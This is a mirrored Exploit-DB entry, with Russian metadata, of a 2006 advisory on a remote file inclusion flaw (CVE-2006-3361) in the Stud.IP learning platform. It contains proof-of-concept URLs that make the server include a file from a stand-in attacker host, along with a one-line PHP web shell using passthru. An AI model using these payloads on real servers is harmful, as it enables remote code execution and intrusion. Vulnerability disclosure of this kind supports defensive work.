- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1969
- Проверка EDB
-
- Пройдено
- Автор
- HAMID EBADI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-3361
- Дата публикации
- 2006-07-01
Код:
/*------------------------------------------------
IHS Public advisory
-------------------------------------------------*/
Stud.IP Remote File Inclusion
Stud.IP is a learning and an information management
system for universities, educational facilities and
enterprises.
http://www.studip.de
http://www.data-quest.de
http://www.sourceforge.net/projects/studip
Discovered by Hamid Ebadi Credit :
all go to IHS team (IHS : IRAN HOMELAND SECURITY)
www.ihsteam.com (persian)
www.ihsteam.net (english)
The original article can be found at:
http://www.hamid.ir/security/
http://www.IHSteam.com
Vulnerable Systems:
studip 1.3.0-2 and below
Input passed to the "_PHPLIB[libdir]" parameter in
studip-phplib/oohforms.inc and to the
"ABSOLUTE_PATH_STUDIP" parameter in
studip-htdocs/archiv_assi.php is not properly verified
before being used to include files.
This can be exploited to execute arbitrary PHP code by
including files from local or external resources.
POC Exploits:
The following URL will cause the server to include
external files
http://localhost/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls -al&ABSOLUTE_PATH_STUDIP=http://attacker/cmd.gif?
http://localhost/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls -al&_PHPLIB[libdir]=http://attacker/cmd.gif?
cmd.gif
<?
passthru($_GET['cmd']);
?>
Solution:
Edit the source code to ensure that input is properly verified.
greeting :
LorD , NT , C0d3r of IHS
# milw0rm.com [2006-07-01]- Источник
- www.exploit-db.com
